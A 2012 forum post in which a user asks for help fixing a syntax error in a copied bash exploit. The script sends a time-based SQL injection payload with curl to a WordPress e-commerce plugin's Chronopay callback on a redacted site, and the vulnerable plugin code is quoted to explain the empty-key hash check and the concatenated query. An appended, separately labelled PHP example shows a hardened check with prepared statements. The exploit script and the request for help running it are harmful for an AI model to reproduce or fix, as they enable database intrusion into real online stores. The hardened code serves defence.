Post 302633473 by iiiiiiiiiii on Wednesday 2nd of May 2012 08:38:12 AM
Syntax error near unexpected token `('

What do I do here?

Code:
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this->load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
./wp-e-commerce/wpsc-core/wpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
            }
 
 
./wp-e-commerce/wpsc-merchants/chronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
            // - this is by default '' and set only if explicitly stated
            //   inside Store Settings->Payments->General Settings->
            //   Chronopay->Edit->Security Key
            // - problem is that there are more popular payment gateways enlisted (e.g.
            //   Google Checkout and PayPal) and if that setting is not explicitly set
            //   it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill':
                        $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                                            `processed` = '2',
                                            `transactid` = '".$transaction_id."',
                                            `date` = '".time()."'
                                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?
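
Added example, not part of the original post and not the plugin's code: a hardened form of the callback check and 'rebill' update quoted above, in PHP. The function names are hypothetical and it assumes session ids are decimal digits; hash_equals() and $wpdb->prepare() are the standard PHP and WordPress calls. It refuses an empty Security Key, compares the hash in constant time, and binds the values instead of concatenating them into the SQL.

```php
<?php
// Added example (hypothetical function names), not the plugin's own code.

/**
 * Returns the validated session id, or null if the callback must be rejected.
 * $salt is the configured Security Key; $post is the request body ($_POST).
 */
function chronopay_verified_sessionid( $salt, array $post ) {
    // With an empty key, md5($salt . md5($cs1 . $salt)) is computable by anyone.
    if ( ! is_string( $salt ) || $salt === '' ) {
        return null;
    }
    foreach ( array( 'cs1', 'cs3' ) as $field ) {
        if ( ! isset( $post[ $field ] ) || ! is_string( $post[ $field ] ) ) {
            return null;
        }
    }
    // Same construction as the quoted code, so legitimate callbacks still verify.
    $expected = md5( $salt . md5( $post['cs1'] . $salt ) );
    // hash_equals() is constant-time and does no type juggling, unlike ==.
    if ( ! hash_equals( $expected, $post['cs3'] ) ) {
        return null;
    }
    // Assumption: session ids consist of decimal digits only.
    $sessionid = trim( $post['cs1'] );
    return ctype_digit( $sessionid ) ? $sessionid : null;
}

/** The 'rebill' update with bound parameters instead of string concatenation. */
function chronopay_mark_rebill( $wpdb, $sessionid, $transaction_id ) {
    $sql = 'UPDATE `' . WPSC_TABLE_PURCHASE_LOGS . '` SET'
         . ' `processed` = %s, `transactid` = %s, `date` = %s'
         . ' WHERE `sessionid` = %s LIMIT 1';
    return $wpdb->query(
        $wpdb->prepare( $sql, '2', $transaction_id, (string) time(), $sessionid )
    );
}

// Constructed inputs: one callback signed with a constructed key.
$key  = 'constructed-test-key';
$cs1  = '1234567890';
$good = array( 'cs1' => $cs1, 'cs3' => md5( $key . md5( $cs1 . $key ) ) );
$odd  = array( 'cs1' => '12ab', 'cs3' => md5( $key . md5( '12ab' . $key ) ) );

var_dump( chronopay_verified_sessionid( $key, $good ) ); // key configured, hash matches
var_dump( chronopay_verified_sessionid( '', $good ) );   // no Security Key configured
var_dump( chronopay_verified_sessionid( $key, $odd ) );  // cs1 is not all digits
```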
 
